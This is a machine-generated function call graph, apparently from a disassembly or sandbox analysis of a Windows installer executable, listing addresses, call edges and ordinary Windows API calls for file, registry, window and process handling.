4613->4614 4616 405d6f GetFileAttributesA 4614->4616 4615 406620 2 API calls 4615->4617 4616->4610 4617->4610 4617->4612 4617->4615 4618 405c66 2 API calls 4617->4618 4618->4612 4619->4574 4620->4603 4644 405dfb GetFileAttributesA 4621->4644 4624 405a34 4624->4603 4625 405a22 RemoveDirectoryA 4627 405a30 4625->4627 4626 405a2a DeleteFileA 4626->4627 4627->4624 4628 405a40 SetFileAttributesA 4627->4628 4628->4624 4630 405c73 4629->4630 4631 405c84 4630->4631 4632 405c78 CharPrevA 4630->4632 4631->4579 4632->4630 4632->4631 4634 40607a 4633->4634 4636 406087 4633->4636 4647 405ef6 4634->4647 4636->4603 4638 406636 FindClose 4637->4638 4639 405be0 4637->4639 4638->4639 4639->4575 4640 405c1f lstrlenA CharPrevA 4639->4640 4641 405bea 4640->4641 4642 405c39 lstrcatA 4640->4642 4641->4588 4642->4641 4643->4607 4645 405a13 4644->4645 4646 405e0d SetFileAttributesA 4644->4646 4645->4624 4645->4625 4645->4626 4646->4645 4648 405f42 GetShortPathNameA 4647->4648 4649 405f1c 4647->4649 4651 406061 4648->4651 4652 405f57 4648->4652 4674 405e20 GetFileAttributesA CreateFileA 4649->4674 4651->4636 4652->4651 4654 405f5f wsprintfA 4652->4654 4653 405f26 CloseHandle GetShortPathNameA 4653->4651 4655 405f3a 4653->4655 4656 406320 21 API calls 4654->4656 4655->4648 4655->4651 4657 405f87 4656->4657 4675 405e20 GetFileAttributesA CreateFileA 4657->4675 4659 405f94 4659->4651 4660 405fa3 GetFileSize GlobalAlloc 4659->4660 4661 405fc5 4660->4661 4662 40605a CloseHandle 4660->4662 4663 405e98 ReadFile 4661->4663 4662->4651 4664 405fcd 4663->4664 4664->4662 4676 405d85 lstrlenA 4664->4676 4667 405fe4 lstrcpyA 4670 406006 4667->4670 4668 405ff8 4669 405d85 4 API calls 4668->4669 4669->4670 4671 40603d SetFilePointer 4670->4671 4672 405ec7 WriteFile 4671->4672 4673 406053 GlobalFree 4672->4673 4673->4662 4674->4653 4675->4659 4677 405dc6 lstrlenA 4676->4677 4678 405d9f lstrcmpiA 4677->4678 4679 405dce 4677->4679 4678->4679 4680 405dbd CharNextA 4678->4680 4679->4667 4679->4668 4680->4677 4681 4033d8 SetErrorMode GetVersionExA 4682 40342a GetVersionExA 4681->4682 4684 403469 4681->4684 4683 403446 4682->4683 4682->4684 4683->4684 4685 4034ed 4684->4685 4686 4066b5 5 API calls 4684->4686 4687 406647 3 API calls 4685->4687 4686->4685 4688 403503 lstrlenA 4687->4688 4688->4685 4689 403513 4688->4689 4690 4066b5 5 API calls 4689->4690 4691 40351a 4690->4691 4692 4066b5 5 API calls 4691->4692 4693 403521 4692->4693 4694 4066b5 5 API calls 4693->4694 4695 40352d #17 OleInitialize SHGetFileInfoA 4694->4695 4770 40628d lstrcpynA 4695->4770 4698 40357b GetCommandLineA 4771 40628d lstrcpynA 4698->4771 4700 40358d 4701 405c4a CharNextA 4700->4701 4702 4035b4 CharNextA 4701->4702 4707 4035c3 4702->4707 4703 403689 4704 40369d GetTempPathA 4703->4704 4772 4033a7 4704->4772 4706 4036b5 4708 4036b9 GetWindowsDirectoryA lstrcatA 4706->4708 4709 40370f DeleteFileA 4706->4709 4707->4703 4710 405c4a CharNextA 4707->4710 4715 40368b 4707->4715 4711 4033a7 12 API calls 4708->4711 4782 402f31 GetTickCount GetModuleFileNameA 4709->4782 4710->4707 4714 4036d5 4711->4714 4713 403722 4718 4037a7 4713->4718 4722 405c4a CharNextA 4713->4722 4761 4037b7 4713->4761 4714->4709 4717 4036d9 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4714->4717 4866 40628d lstrcpynA 4715->4866 4720 4033a7 12 API calls 4717->4720 4810 403a96 4718->4810 4724 403707 4720->4724 4725 40373c 4722->4725 4724->4709 4724->4761 4734 403781 4725->4734 4735 4037e6 4725->4735 4726 4037d1 4876 4059a3 4726->4876 4727 403928 4728 403930 GetCurrentProcess OpenProcessToken 4727->4728 4729 4039a6 ExitProcess 4727->4729 4732 403976 4728->4732 4733 403947 LookupPrivilegeValueA AdjustTokenPrivileges 4728->4733 4737 4066b5 5 API calls 4732->4737 4733->4732 4738 405d0d 18 API calls 4734->4738 4739 40590e 5 API calls 4735->4739 4740 40397d 4737->4740 4741 40378d 4738->4741 4742 4037eb lstrlenA 4739->4742 4743 403992 ExitWindowsEx 4740->4743 4745 40399f 4740->4745 4741->4761 4867 40628d lstrcpynA 4741->4867 4880 40628d lstrcpynA 4742->4880 4743->4729 4743->4745 4748 40140b 2 API calls 4745->4748 4747 403803 4754 40381b 4747->4754 4881 40628d lstrcpynA 4747->4881 4748->4729 4749 40379c 4868 40628d lstrcpynA 4749->4868 4752 403839 wsprintfA 4753 406320 21 API calls 4752->4753 4753->4754 4754->4752 4767 403867 4754->4767 4755 405897 2 API calls 4755->4767 4756 4058f1 2 API calls 4756->4767 4757 403877 GetFileAttributesA 4760 403883 DeleteFileA 4757->4760 4757->4767 4758 4038af SetCurrentDirectoryA 4759 406066 40 API calls 4758->4759 4762 4038be CopyFileA 4759->4762 4760->4767 4869 4039bc 4761->4869 4762->4761 4762->4767 4763 405a4f 71 API calls 4763->4767 4764 406066 40 API calls 4764->4767 4765 406320 21 API calls 4765->4767 4766 405926 2 API calls 4766->4767 4767->4752 4767->4754 4767->4755 4767->4756 4767->4757 4767->4758 4767->4761 4767->4763 4767->4764 4767->4765 4767->4766 4768 403918 CloseHandle 4767->4768 4769 406620 2 API calls 4767->4769 4768->4761 4769->4767 4770->4698 4771->4700 4773 406587 5 API calls 4772->4773 4774 4033b3 4773->4774 4775 4033bd 4774->4775 4776 405c1f 3 API calls 4774->4776 4775->4706 4777 4033c5 4776->4777 4778 4058f1 2 API calls 4777->4778 4779 4033cb 4778->4779 4780 405e4f 2 API calls 4779->4780 4781 4033d6 4780->4781 4781->4706 4882 405e20 GetFileAttributesA CreateFileA 4782->4882 4784 402f71 4803 402f81 4784->4803 4883 40628d lstrcpynA 4784->4883 4786 402f97 4787 405c66 2 API calls 4786->4787 4788 402f9d 4787->4788 4884 40628d lstrcpynA 4788->4884 4790 402fa8 GetFileSize 4791 4030a2 4790->4791 4805 402fbf 4790->4805 4885 402ecd 4791->4885 4793 4030ab 4795 4030db GlobalAlloc 4793->4795 4793->4803 4897 403390 SetFilePointer 4793->4897 4794 40337a ReadFile 4794->4805 4896 403390 SetFilePointer 4795->4896 4798 40310e 4800 402ecd 6 API calls 4798->4800 4799 4030f6 4802 403168 35 API calls 4799->4802 4800->4803 4801 4030c4 4804 40337a ReadFile 4801->4804 4808 403102 4802->4808 4803->4713 4806 4030cf 4804->4806 4805->4791 4805->4794 4805->4798 4805->4803 4807 402ecd 6 API calls 4805->4807 4806->4795 4806->4803 4807->4805 4808->4803 4808->4808 4809 40313f SetFilePointer 4808->4809 4809->4803 4811 4066b5 5 API calls 4810->4811 4812 403aaa 4811->4812 4813 403ab0 4812->4813 4814 403ac2 4812->4814 4906 4061eb wsprintfA 4813->4906 4815 406174 3 API calls 4814->4815 4816 403aed 4815->4816 4818 403b0b lstrcatA 4816->4818 4820 406174 3 API calls 4816->4820 4819 403ac0 4818->4819 4898 403d5b 4819->4898 4820->4818 4823 405d0d 18 API calls 4824 403b3d 4823->4824 4825 403bc6 4824->4825 4827 406174 3 API calls 4824->4827 4826 405d0d 18 API calls 4825->4826 4828 403bcc 4826->4828 4829 403b69 4827->4829 4830 403bdc LoadImageA 4828->4830 4831 406320 21 API calls 4828->4831 4829->4825 4835 403b85 lstrlenA 4829->4835 4838 405c4a CharNextA 4829->4838 4832 403c82 4830->4832 4833 403c03 RegisterClassA 4830->4833 4831->4830 4834 40140b 2 API calls 4832->4834 4836 403c39 SystemParametersInfoA CreateWindowExA 4833->4836 4865 403c8c 4833->4865 4837 403c88 4834->4837 4839 403b93 lstrcmpiA 4835->4839 4840 403bb9 4835->4840 4836->4832 4845 403d5b 22 API calls 4837->4845 4837->4865 4842 403b83 4838->4842 4839->4840 4843 403ba3 GetFileAttributesA 4839->4843 4841 405c1f 3 API calls 4840->4841 4846 403bbf 4841->4846 4842->4835 4844 403baf 4843->4844 4844->4840 4847 405c66 2 API calls 4844->4847 4848 403c99 4845->4848 4907 40628d lstrcpynA 4846->4907 4847->4840 4850 403ca5 ShowWindow 4848->4850 4851 403d28 4848->4851 4853 406647 3 API calls 4850->4853 4852 4054a3 5 API calls 4851->4852 4854 403d2e 4852->4854 4855 403cbd 4853->4855 4856 403d32 4854->4856 4857 403d4a 4854->4857 4858 403ccb GetClassInfoA 4855->4858 4860 406647 3 API calls 4855->4860 4863 40140b 2 API calls 4856->4863 4856->4865 4859 40140b 2 API calls 4857->4859 4861 403cf5 DialogBoxParamA 4858->4861 4862 403cdf GetClassInfoA RegisterClassA 4858->4862 4859->4865 4860->4858 4864 40140b 2 API calls 4861->4864 4862->4861 4863->4865 4864->4865 4865->4761 4866->4704 4867->4749 4868->4718 4870 4039d4 4869->4870 4871 4039c6 CloseHandle 4869->4871 4909 403a01 4870->4909 4871->4870 4874 405a4f 71 API calls 4875 4037bf OleUninitialize 4874->4875 4875->4726 4875->4727 4877 4059b8 4876->4877 4878 4037de ExitProcess 4877->4878 4879 4059cc MessageBoxIndirectA 4877->4879 4879->4878 4880->4747 4881->4754 4882->4784 4883->4786 4884->4790 4886 402ed6 4885->4886 4887 402eee 4885->4887 4888 402ee6 4886->4888 4889 402edf DestroyWindow 4886->4889 4890 402ef6 4887->4890 4891 402efe GetTickCount 4887->4891 4888->4793 4889->4888 4892 4066f1 2 API calls 4890->4892 4893 402f0c CreateDialogParamA ShowWindow 4891->4893 4894 402f2f 4891->4894 4895 402efc 4892->4895 4893->4894 4894->4793 4895->4793 4896->4799 4897->4801 4899 403d6f 4898->4899 4908 4061eb wsprintfA 4899->4908 4901 403de0 4902 403e14 22 API calls 4901->4902 4903 403de5 4902->4903 4904 403b1b 4903->4904 4905 406320 21 API calls 4903->4905 4904->4823 4905->4903 4906->4819 4907->4825 4908->4901 4910 403a0f 4909->4910 4911 4039d9 4910->4911 4912 403a14 FreeLibrary GlobalFree 4910->4912 4911->4874 4912->4911 4912->4912 4913 402758 4914 40275f 4913->4914 4915 402a6c 4913->4915 4916 402c3c 21 API calls 4914->4916 4917 402766 4916->4917 4918 402775 SetFilePointer 4917->4918 4918->4915 4919 402785 4918->4919 4921 4061eb wsprintfA 4919->4921 4921->4915 5064 401e5a GetDC 5065 402c3c 21 API calls 5064->5065 5066 401e6c GetDeviceCaps MulDiv ReleaseDC 5065->5066 5067 402c3c 21 API calls 5066->5067 5068 401e9d 5067->5068 5069 406320 21 API calls 5068->5069 5070 401eda CreateFontIndirectA 5069->5070 5071 40264d 5070->5071 3904 4015e0 3923 402c5e 3904->3923 3908 401649 3910 401677 3908->3910 3911 40164e 3908->3911 3914 401423 28 API calls 3910->3914 3945 401423 3911->3945 3920 40166f 3914->3920 3918 401660 SetCurrentDirectoryA 3918->3920 3919 4015ef 3919->3908 3921 401631 GetFileAttributesA 3919->3921 3935 405c4a 3919->3935 3939 40590e 3919->3939 3942 405897 CreateDirectoryA 3919->3942 3949 4058f1 CreateDirectoryA 3919->3949 3921->3919 3924 402c6a 3923->3924 3952 406320 3924->3952 3927 4015e7 3929 405cb8 CharNextA CharNextA 3927->3929 3930 405cd3 3929->3930 3933 405ce3 3929->3933 3931 405cde CharNextA 3930->3931 3930->3933 3934 405d03 3931->3934 3932 405c4a CharNextA 3932->3933 3933->3932 3933->3934 3934->3919 3936 405c50 3935->3936 3937 405c63 3936->3937 3938 405c56 CharNextA 3936->3938 3937->3919 3938->3936 3940 4066b5 5 API calls 3939->3940 3941 405915 3940->3941 3941->3919 3943 4058e3 3942->3943 3944 4058e7 GetLastError 3942->3944 3943->3919 3944->3943 3999 4053d1 3945->3999 3948 40628d lstrcpynA 3948->3918 3950 405901 3949->3950 3951 405905 GetLastError 3949->3951 3950->3919 3951->3950 3965 40632d 3952->3965 3953 40656e 3954 402c8b 3953->3954 3991 40628d lstrcpynA 3953->3991 3954->3927 3969 406587 3954->3969 3956 406545 lstrlenA 3956->3965 3959 406320 15 API calls 3959->3956 3961 40644c GetSystemDirectoryA 3961->3965 3962 406462 GetWindowsDirectoryA 3962->3965 3963 406587 5 API calls 3963->3965 3964 4064ee lstrcatA 3964->3965 3965->3953 3965->3956 3965->3959 3965->3961 3965->3962 3965->3963 3965->3964 3966 406320 15 API calls 3965->3966 3968 4064c5 SHGetPathFromIDListA CoTaskMemFree 3965->3968 3978 406174 3965->3978 3983 4066b5 GetModuleHandleA 3965->3983 3989 4061eb wsprintfA 3965->3989 3990 40628d lstrcpynA 3965->3990 3966->3965 3968->3965 3976 406593 3969->3976 3970 4065fb 3971 4065ff CharPrevA 3970->3971 3973 40661a 3970->3973 3971->3970 3972 4065f0 CharNextA 3972->3970 3972->3976 3973->3927 3974 405c4a CharNextA 3974->3976 3975 4065de CharNextA 3975->3976 3976->3970 3976->3972 3976->3974 3976->3975 3977 4065eb CharNextA 3976->3977 3977->3972 3992 406113 3978->3992 3981 4061a8 RegQueryValueExA RegCloseKey 3982 4061d7 3981->3982 3982->3965 3984 4066d1 3983->3984 3985 4066db GetProcAddress 3983->3985 3996 406647 GetSystemDirectoryA 3984->3996 3987 4066ea 3985->3987 3987->3965 3988 4066d7 3988->3985 3988->3987 3989->3965 3990->3965 3991->3954 3993 406122 3992->3993 3994 406126 3993->3994 3995 40612b RegOpenKeyExA 3993->3995 3994->3981 3994->3982 3995->3994 3997 406669 wsprintfA LoadLibraryExA 3996->3997 3997->3988 4000 401431 3999->4000 4001 4053ec 3999->4001 4000->3948 4002 405409 lstrlenA 4001->4002 4003 406320 21 API calls 4001->4003 4004 405432 4002->4004 4005 405417 lstrlenA 4002->4005 4003->4002 4007 405445 4004->4007 4008 405438 SetWindowTextA 4004->4008 4005->4000 4006 405429 lstrcatA 4005->4006 4006->4004 4007->4000 4009 40544b SendMessageA SendMessageA SendMessageA 4007->4009 4008->4007 4009->4000 5072 4016e0 5073 402c5e 21 API calls 5072->5073 5074 4016e6 GetFullPathNameA 5073->5074 5075 4016fd 5074->5075 5081 40171e 5074->5081 5078 406620 2 API calls 5075->5078 5075->5081 5076 401732 GetShortPathNameA 5077 402aea 5076->5077 5079 40170e 5078->5079 5079->5081 5082 40628d lstrcpynA 5079->5082 5081->5076 5081->5077 5082->5081 5083 404463 lstrcpynA lstrlenA 4309 401eea 4310 402c3c 21 API calls 4309->4310 4311 401ef0 4310->4311 4312 402c3c 21 API calls 4311->4312 4313 401efc 4312->4313 4314 401f13 EnableWindow 4313->4314 4315 401f08 ShowWindow 4313->4315 4316 402aea 4314->4316 4315->4316 4317 40176b 4318 402c5e 21 API calls 4317->4318 4319 401772 4318->4319 4323 405e4f 4319->4323 4321 401779 4322 405e4f 2 API calls 4321->4322 4322->4321 4324 405e5a GetTickCount GetTempFileNameA 4323->4324 4325 405e8b 4324->4325 4326 405e87 4324->4326 4325->4321 4326->4324 4326->4325 5084 40196c 5085 402c5e 21 API calls 5084->5085 5086 401973 lstrlenA 5085->5086 5087 40264d 5086->5087 5088 401ff0 5089 402c5e 21 API calls 5088->5089 5090 401ff7 5089->5090 5091 406620 2 API calls 5090->5091 5092 401ffd 5091->5092 5094 40200f 5092->5094 5095 4061eb wsprintfA 5092->5095 5095->5094 5096 6e331000 5097 6e33101b 5 API calls 5096->5097 5098 6e331019 5097->5098 5099 4014f4 SetForegroundWindow 5100 402aea 5099->5100 5101 404778 5102 404788 5101->5102 5103 4047ae 5101->5103 5104 40432d 22 API calls 5102->5104 5105 404394 8 API calls 5103->5105 5106 404795 SetDlgItemTextA 5104->5106 5107 4047ba 5105->5107 5106->5103 4932 40177e 4933 402c5e 21 API calls 4932->4933 4934 401785 4933->4934 4935 4017a3 4934->4935 4936 4017ab 4934->4936 4971 40628d lstrcpynA 4935->4971 4972 40628d lstrcpynA 4936->4972 4939 4017a9 4943 406587 5 API calls 4939->4943 4940 4017b6 4941 405c1f 3 API calls 4940->4941 4942 4017bc lstrcatA 4941->4942 4942->4939 4954 4017c8 4943->4954 4944 406620 2 API calls 4944->4954 4945 405dfb 2 API calls 4945->4954 4947 4017df CompareFileTime 4947->4954 4948 4018a3 4949 4053d1 28 API calls 4948->4949 4950 4018ad 4949->4950 4953 403168 35 API calls 4950->4953 4951 4053d1 28 API calls 4967 40188f 4951->4967 4952 40628d lstrcpynA 4952->4954 4955 4018c0 4953->4955 4954->4944 4954->4945 4954->4947 4954->4948 4954->4952 4957 406320 21 API calls 4954->4957 4964 4059a3 MessageBoxIndirectA 4954->4964 4969 40187a 4954->4969 4970 405e20 GetFileAttributesA CreateFileA 4954->4970 4956 4018d4 SetFileTime 4955->4956 4958 4018e6 CloseHandle 4955->4958 4956->4958 4957->4954 4959 4018f7 4958->4959 4958->4967 4960 4018fc 4959->4960 4961 40190f 4959->4961 4962 406320 21 API calls 4960->4962 4963 406320 21 API calls 4961->4963 4965 401904 lstrcatA 4962->4965 4966 401917 4963->4966 4964->4954 4965->4966 4966->4967 4968 4059a3 MessageBoxIndirectA 4966->4968 4968->4967 4969->4951 4969->4967 4970->4954 4971->4939 4972->4940 5108 40167e 5109 402c5e 21 API calls 5108->5109 5110 401684 5109->5110 5111 406620 2 API calls 5110->5111 5112 40168a 5111->5112 5113 40197e 5114 402c3c 21 API calls 5113->5114 5115 401985 5114->5115 5116 402c3c 21 API calls 5115->5116 5117 401992 5116->5117 5118 402c5e 21 API calls 5117->5118 5119 4019a9 lstrlenA 5118->5119 5120 4019b9 5119->5120 5121 4019f9 5120->5121 5125 40628d lstrcpynA 5120->5125 5123 4019e9 5123->5121 5124 4019ee lstrlenA 5123->5124 5124->5121 5125->5123 5126 401000 5127 401037 BeginPaint GetClientRect 5126->5127 5128 40100c DefWindowProcA 5126->5128 5130 4010f3 5127->5130 5131 401179 5128->5131 5132 401073 CreateBrushIndirect FillRect DeleteObject 5130->5132 5133 4010fc 5130->5133 5132->5130 5134 401102 CreateFontIndirectA 5133->5134 5135 401167 EndPaint 5133->5135 5134->5135 5136 401112 6 API calls 5134->5136 5135->5131 5136->5135 5137 6e332c73 5138 6e332c8b 5137->5138 5139 6e3315c4 2 API calls 5138->5139 5140 6e332ca6 5139->5140 5141 401502 5142 401507 5141->5142 5144 40152d 5141->5144 5143 402c3c 21 API calls 5142->5143 5143->5144 5145 401a83 5146 402c3c 21 API calls 5145->5146 5147 401a8c 5146->5147 5148 402c3c 21 API calls 5147->5148 5149 401a33 5148->5149 5150 401588 5151 402a67 5150->5151 5154 4061eb wsprintfA 5151->5154 5153 402a6c 5154->5153 5155 401b88 5156 402c5e 21 API calls 5155->5156 5157 401b8f 5156->5157 5158 402c3c 21 API calls 5157->5158 5159 401b98 wsprintfA 5158->5159 5160 402aea 5159->5160 5161 401d8a 5162 401d90 5161->5162 5163 401d9d GetDlgItem 5161->5163 5164 402c3c 21 API calls 5162->5164 5165 401d97 5163->5165 5164->5165 5166 401dde GetClientRect LoadImageA SendMessageA 5165->5166 5167 402c5e 21 API calls 5165->5167 5169 401e3f 5166->5169 5171 401e4b 5166->5171 5167->5166 5170 401e44 DeleteObject 5169->5170 5169->5171 5170->5171 5172 40278b 5173 402791 5172->5173 5174 402799 FindClose 5173->5174 5175 402aea 5173->5175 5174->5175 5176 40240d 5177 402c5e 21 API calls 5176->5177 5178 40241e 5177->5178 5179 402c5e 21 API calls 5178->5179 5180 402427 5179->5180 5181 402c5e 21 API calls 5180->5181 5182 402431 GetPrivateProfileStringA 5181->5182 5183 40280d 5184 402c5e 21 API calls 5183->5184 5185 402819 5184->5185 5186 40282f 5185->5186 5188 402c5e 21 API calls 5185->5188 5187 405dfb 2 API calls 5186->5187 5189 402835 5187->5189 5188->5186 5211 405e20 GetFileAttributesA CreateFileA 5189->5211 5191 402842 5192 4028fe 5191->5192 5193 4028e6 5191->5193 5194 40285d GlobalAlloc 5191->5194 5195 402905 DeleteFileA 5192->5195 5196 402918 5192->5196 5198 403168 35 API calls 5193->5198 5194->5193 5197 402876 5194->5197 5195->5196 5212 403390 SetFilePointer 5197->5212 5200 4028f3 CloseHandle 5198->5200 5200->5192 5201 40287c 5202 40337a ReadFile 5201->5202 5203 402885 GlobalAlloc 5202->5203 5204 402895 5203->5204 5205 4028cf 5203->5205 5207 403168 35 API calls 5204->5207 5206 405ec7 WriteFile 5205->5206 5208 4028db GlobalFree 5206->5208 5210 4028a2 5207->5210 5208->5193 5209 4028c6 GlobalFree 5209->5205 5210->5209 5211->5191 5212->5201 4356 40550f 4357 405531 GetDlgItem GetDlgItem GetDlgItem 4356->4357 4358 4056ba 4356->4358 4402 404362 SendMessageA 4357->4402 4359 4056c2 GetDlgItem CreateThread CloseHandle 4358->4359 4360 4056ea 4358->4360 4359->4360 4425 4054a3 OleInitialize 4359->4425 4362 405718 4360->4362 4364 405700 ShowWindow ShowWindow 4360->4364 4365 405739 4360->4365 4366 405720 4362->4366 4367 405773 4362->4367 4363 4055a1 4368 4055a8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4363->4368 4407 404362 SendMessageA 4364->4407 4411 404394 4365->4411 4370 405728 4366->4370 4371 40574c ShowWindow 4366->4371 4367->4365 4375 405780 SendMessageA 4367->4375 4373 405616 4368->4373 4374 4055fa SendMessageA SendMessageA 4368->4374 4408 404306 4370->4408 4378 40576c 4371->4378 4379 40575e 4371->4379 4381 405629 4373->4381 4382 40561b SendMessageA 4373->4382 4374->4373 4377 405745 4375->4377 4383 405799 CreatePopupMenu 4375->4383 4380 404306 SendMessageA 4378->4380 4384 4053d1 28 API calls 4379->4384 4380->4367 4403 40432d 4381->4403 4382->4381 4385 406320 21 API calls 4383->4385 4384->4378 4387 4057a9 AppendMenuA 4385->4387 4389 4057c7 GetWindowRect 4387->4389 4390 4057da TrackPopupMenu 4387->4390 4388 405639 4391 405642 ShowWindow 4388->4391 4392 405676 GetDlgItem SendMessageA 4388->4392 4389->4390 4390->4377 4393 4057f6 4390->4393 4394 405665 4391->4394 4395 405658 ShowWindow 4391->4395 4392->4377 4396 40569d SendMessageA SendMessageA 4392->4396 4397 405815 SendMessageA 4393->4397 4406 404362 SendMessageA 4394->4406 4395->4394 4396->4377 4397->4397 4398 405832 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4397->4398 4400 405854 SendMessageA 4398->4400 4400->4400 4401 405876 GlobalUnlock SetClipboardData CloseClipboard 4400->4401 4401->4377 4402->4363 4404 406320 21 API calls 4403->4404 4405 404338 SetDlgItemTextA 4404->4405 4405->4388 4406->4392 4407->4362 4409 404313 SendMessageA 4408->4409 4410 40430d 4408->4410 4409->4365 4410->4409 4412 404457 4411->4412 4413 4043ac GetWindowLongA 4411->4413 4412->4377 4413->4412 4414 4043c1 4413->4414 4414->4412 4415 4043f1 4414->4415 4416 4043ee GetSysColor 4414->4416 4417 404401 SetBkMode 4415->4417 4418 4043f7 SetTextColor 4415->4418 4416->4415 4419 404419 GetSysColor 4417->4419 4420 40441f 4417->4420 4418->4417 4419->4420 4421 404430 4420->4421 4422 404426 SetBkColor 4420->4422 4421->4412 4423 404443 DeleteObject 4421->4423 4424 40444a CreateBrushIndirect 4421->4424 4422->4421 4423->4424 4424->4412 4432 404379 4425->4432 4427 404379 SendMessageA 4429 4054ff OleUninitialize 4427->4429 4428 4054c6 4431 4054ed 4428->4431 4435 401389 4428->4435 4431->4427 4433 404391 4432->4433 4434 404382 SendMessageA 4432->4434 4433->4428 4434->4433 4437 401390 4435->4437 4436 4013fe 4436->4428 4437->4436 4438 4013cb MulDiv SendMessageA 4437->4438 4438->4437 5213 40168f 5214 402c5e 21 API calls 5213->5214 5215 401696 5214->5215 5216 402c5e 21 API calls 5215->5216 5217 40169f 5216->5217 5218 402c5e 21 API calls 5217->5218 5219 4016a8 MoveFileA 5218->5219 5220 4016b4 5219->5220 5221 4016bb 5219->5221 5223 401423 28 API calls 5220->5223 5222 406620 2 API calls 5221->5222 5225 40230f 5221->5225 5224 4016ca 5222->5224 5223->5225 5224->5225 5226 406066 40 API calls 5224->5226 5226->5220 5227 401490 5228 4053d1 28 API calls 5227->5228 5229 401497 5228->5229 5230 404b10 5231 404b20 5230->5231 5232 404b3c 5230->5232 5241 405987 GetDlgItemTextA 5231->5241 5234 404b42 SHGetPathFromIDListA 5232->5234 5235 404b6f 5232->5235 5237 404b59 SendMessageA 5234->5237 5238 404b52 5234->5238 5236 404b2d SendMessageA 5236->5232 5237->5235 5239 40140b 2 API calls 5238->5239 5239->5237 5241->5236 5242 401a12 5243 402c5e 21 API calls 5242->5243 5244 401a19 5243->5244 5245 402c5e 21 API calls 5244->5245 5246 401a22 5245->5246 5247 401a29 lstrcmpiA 5246->5247 5248 401a3b lstrcmpA 5246->5248 5249 401a2f 5247->5249 5248->5249 5250 6e331661 5251 6e33154b GlobalFree 5250->5251 5253 6e331679 5251->5253 5252 6e3316bf GlobalFree 5253->5252 5254 6e331694 5253->5254 5255 6e3316ab VirtualFree 5253->5255 5254->5252 5255->5252 5256 6e3310e0 5265 6e331110 5256->5265 5257 6e33129a GlobalFree 5258 6e3311cd GlobalAlloc 5258->5265 5259 6e331295 5259->5257 5260 6e331286 GlobalFree 5260->5265 5261 6e33133d 2 API calls 5261->5265 5262 6e3312f6 2 API calls 5262->5265 5263 6e331165 GlobalAlloc 5263->5265 5264 6e331361 lstrcpyA 5264->5265 5265->5257 5265->5258 5265->5259 5265->5260 5265->5261 5265->5262 5265->5263 5265->5264 4552 401594 4553 4015a4 ShowWindow 4552->4553 4554 4015ab 4552->4554 4553->4554 4555 4015b9 ShowWindow 4554->4555 4556 402aea 4554->4556 4555->4556 5266 404498 5267 4044ae 5266->5267 5272 4045ba 5266->5272 5270 40432d 22 API calls 5267->5270 5268 404629 5269 4046f3 5268->5269 5271 404633 GetDlgItem 5268->5271 5278 404394 8 API calls 5269->5278 5273 404504 5270->5273 5274 4046b1 5271->5274 5275 404649 5271->5275 5272->5268 5272->5269 5276 4045fe GetDlgItem SendMessageA 5272->5276 5277 40432d 22 API calls 5273->5277 5274->5269 5280 4046c3 5274->5280 5275->5274 5279 40466f SendMessageA LoadCursorA SetCursor 5275->5279 5299 40434f KiUserCallbackDispatcher 5276->5299 5282 404511 CheckDlgButton 5277->5282 5290 4046ee 5278->5290 5303 40473c 5279->5303 5284 4046c9 SendMessageA 5280->5284 5285 4046da 5280->5285 5297 40434f KiUserCallbackDispatcher 5282->5297 5284->5285 5289 4046e0 SendMessageA 5285->5289 5285->5290 5286 404624 5300 404718 5286->5300 5289->5290 5292 40452f GetDlgItem 5298 404362 SendMessageA 5292->5298 5294 404545 SendMessageA 5295 404563 GetSysColor 5294->5295 5296 40456c SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5294->5296 5295->5296 5296->5290 5297->5292 5298->5294 5299->5286 5301 404726 5300->5301 5302 40472b SendMessageA 5300->5302 5301->5302 5302->5268 5306 405969 ShellExecuteExA 5303->5306 5305 4046a2 LoadCursorA SetCursor 5305->5274 5306->5305 5307 402318 5308 402c5e 21 API calls 5307->5308 5309 40231e 5308->5309 5310 402c5e 21 API calls 5309->5310 5311 402327 5310->5311 5312 402c5e 21 API calls 5311->5312 5313 402330 5312->5313 5314 406620 2 API calls 5313->5314 5315 402339 5314->5315 5316 40234a lstrlenA lstrlenA 5315->5316 5317 40233d 5315->5317 5319 4053d1 28 API calls 5316->5319 5318 4053d1 28 API calls 5317->5318 5320 402345 5317->5320 5318->5320 5321 402386 SHFileOperationA 5319->5321 5321->5317 5321->5320 5322 402198 5323 402c5e 21 API calls 5322->5323 5324 40219f 5323->5324 5325 402c5e 21 API calls 5324->5325 5326 4021a9 5325->5326 5327 402c5e 21 API calls 5326->5327 5328 4021b3 5327->5328 5329 402c5e 21 API calls 5328->5329 5330 4021c0 5329->5330 5331 402c5e 21 API calls 5330->5331 5332 4021ca 5331->5332 5333 40220c CoCreateInstance 5332->5333 5334 402c5e 21 API calls 5332->5334 5335 4022d9 5333->5335 5337 40222b 5333->5337 5334->5333 5336 401423 28 API calls 5335->5336 5338 40230f 5335->5338 5336->5338 5337->5335 5339 4022b9 MultiByteToWideChar 5337->5339 5339->5335 5340 6e3322ea 5341 6e332354 5340->5341 5342 6e33237e 5341->5342 5343 6e33235f GlobalAlloc 5341->5343 5343->5341 4922 40269a 4923 402c3c 21 API calls 4922->4923 4928 4026a4 4923->4928 4924 402712 4925 405e98 ReadFile 4925->4928 4926 402714 4931 4061eb wsprintfA 4926->4931 4927 402724 4927->4924 4930 40273a SetFilePointer 4927->4930 4928->4924 4928->4925 4928->4926 4928->4927 4930->4924 4931->4924 5344 40239a 5345 4023a1 5344->5345 5346 4023b4 5344->5346 5347 406320 21 API calls 5345->5347 5348 4023ae 5347->5348 5348->5346 5349 4059a3 MessageBoxIndirectA 5348->5349 5349->5346 5350 402a1b 5351 402a22 5350->5351 5352 402a6e 5350->5352 5355 402c3c 21 API calls 5351->5355 5356 402a6c 5351->5356 5353 4066b5 5 API calls 5352->5353 5354 402a75 5353->5354 5357 402c5e 21 API calls 5354->5357 5358 402a30 5355->5358 5360 402a7e 5357->5360 5359 402c3c 21 API calls 5358->5359 5362 402a3f 5359->5362 5360->5356 5368 4062e0 5360->5368 5367 4061eb wsprintfA 5362->5367 5363 402a8c 5363->5356 5372 4062ca 5363->5372 5367->5356 5369 4062eb 5368->5369 5370 40630e IIDFromString 5369->5370 5371 406307 5369->5371 5370->5363 5371->5363 5375 4062af WideCharToMultiByte 5372->5375 5374 402aad CoTaskMemFree 5374->5356 5375->5374 5376 40149d 5377 4023b4 5376->5377 5378 4014ab PostQuitMessage 